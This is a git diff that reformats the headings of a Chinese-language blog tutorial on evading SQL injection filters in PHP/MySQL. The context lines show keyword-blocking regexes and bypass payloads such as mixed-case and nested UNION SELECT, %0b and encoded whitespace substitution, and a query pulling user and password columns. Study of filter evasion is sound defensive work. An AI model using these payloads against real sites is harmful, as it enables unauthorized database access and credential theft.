--- a/_posts/2019-04-05-高级SQL注入：混淆和绕过.md
+++ b/_posts/2019-04-05-高级SQL注入：混淆和绕过.md
@@ -48,14 +48,12 @@ tag: 代码审计
 
 本节将讲解基于PHP和MySQL的过滤规避行为以及如何绕过过滤
 
-<br>
-
 
 ----
 
 ### <span id = "hanshu">绕过函数和关键词过滤</span>
 
-#### 关键词过滤： `and` , `or` <br>
+## **关键词过滤： `and` , `or`**
 
 PHP过滤代码：
 ```php 
@@ -80,7 +78,7 @@ preg_match('/(and|or)/i',$id)
 <br>
 
 
-**关键词过滤：** `and` , `or` , `union` <br>
+## **关键词过滤：`and` , `or` , `union`**
 
 PHP过滤代码：
 ```php 
@@ -105,7 +103,7 @@ union select user,password from users
 <br>
 
 
-**关键词过滤：** `and` , `or` , `union` , `where` <br>
+## **关键词过滤：`and` , `or` , `union` , `where`**
 
 PHP过滤代码：
 ```php 
@@ -130,7 +128,7 @@ preg_match ('/(and|or|union|where)/i',$id)
 <br>
 
 
-**关键词过滤：** `and` , `or` , `union` , `where` , `limit` <br>
+## **关键词过滤：`and` , `or` , `union` , `where` , `limit`**
 
 PHP过滤代码：
 ```php 
@@ -161,7 +159,7 @@ preg_match ('/(and|or|union|where|limit)/i',$id)
 <br>
 
 
-**关键词过滤：** `and` , `or` , `union` , `where` , `limit` , `group by` <br>
+## **关键词过滤：`and` , `or` , `union` , `where` , `limit` , `group by`**
 
 PHP过滤代码：
 ```php 
@@ -228,7 +226,7 @@ substr('1,2,3,4,5',0,1)
 <br>
 
 
-**关键词过滤：** `and` , `or` , `union` , `where` , `limit` , `group by` , `select` ,`'`(分号) <br>
+## **关键词过滤：`and` , `or` , `union` , `where` , `limit` , `group by` , `select` ,`'`(分号)**
 
 PHP过滤代码：
 ```php 
@@ -267,7 +265,7 @@ preg_match ('/(and|or|union|where|limit|group by|select|\')/i',$id)
 <br>
 
 
-**关键词过滤：** `and` , `or` , `union` , `where` , `limit` , `group by` , `select` ,`'`(分号) , `hex`<br>
+## **关键词过滤：`and` , `or` , `union` , `where` , `limit` , `group by` , `select` ,`'`(分号) , `hex`**
 
 PHP过滤代码：
 ```php 
@@ -315,7 +313,7 @@ preg_match ('/(and|or|union|where|limit|group by|select|\'|hex)/i',$id)
 <br>
 
 
-**关键词过滤：** `and` , `or` , `union` , `where` , `limit` , `group by` , `select` ,`'`(分号) , `hex` , `substr`<br>
+## **关键词过滤：`and` , `or` , `union` , `where` , `limit` , `group by` , `select` ,`'`(分号) , `hex` , `substr`**
 
 PHP过滤代码：
 ```php 
@@ -350,7 +348,7 @@ preg_match ('/(and|or|union|where|limit|group by|select|\'|hex|substr)/i',$id)
 <br>
 
 
-**关键词过滤：** `and` , `or` , `union` , `where` , `limit` , `group by` , `select` ,`'`(分号) , `hex` , `substr` , `white space`(英文空格，空白区间的意思)<br>
+## **关键词过滤：`and` , `or` , `union` , `where` , `limit` , `group by` , `select` ,`'`(分号) , `hex` , `substr` , `white space`(英文空格，空白区间的意思)**
 
 PHP过滤代码：
 ```php 
@@ -376,13 +374,10 @@ preg_match ('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i',$id
 另外，这些都可以用来替换空白符，<br>
 **`%20 %09 %0a %0b %0c %0d %a0 %00  /**/  /*!*/`**
 
-
 -----
-<br>
 
 
 ### <span id = "re">绕过正则表达式过滤</span>
------------------
 
 过滤注入： `1 or 1 = 1` <br>
 
@@ -395,12 +390,9 @@ preg_match ('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i',$id
 ```
 
 -------
-<br>
 
 
 ### <span id = "hunxiao">常见混淆绕过技术</span>
------------------
-<br>
 
 变换大小写，<br>
 
@@ -419,7 +411,6 @@ http://www.xxx.com/index.php?id=1+UnIoN/**/SeLecT/**/1,2,3--
 ```
 
 ----------
-<br>
 
 
 替换关键词，<br>
@@ -434,8 +425,6 @@ http://www.xxx.com/index.php?id=1+UNunionION+SEselectLECT+1,2,3--
 ```
 
 ----------
-<br>
-
 
 某些情况下SQL关键词被过滤掉并且被替换成空格。因此我们用**`%0b`**来绕过。
 
@@ -445,8 +434,6 @@ http://www.xxx.com/index.php?id=1+uni%0bon+se%0blect+1,2,3--
 ```
 
 ---------
-<br>
-
 
 对于注释 **`/**/`** 不能绕，那么我们用 **`%0b`** 代替 **`/**/`** 。<br>
 
@@ -457,8 +444,6 @@ http://www.xxx.com/index.php?id=1+uni%0bon+se%0blect+1,2,3--
 ```
 
 --------
-<br>
-
 
 **字符编码** <br>
 
@@ -480,8 +465,6 @@ http://www.xxx.com/index.php?id=1+uni%0bon+se%0blect+1,2,3--
 其他的可以自己动手多去尝试。
 
 -------
-<br>
-
 
 对于某些过滤了 `NULL` 字符，和 **`'`** 单引号的，<br>
 
@@ -494,7 +477,6 @@ http://www.xxx.com/index.php?id=1+uni%0bon+se%0blect+1,2,3--
 ```
 
 ---------
-<br>
 
 
 ### <span id = "f1">附1：小结</span>
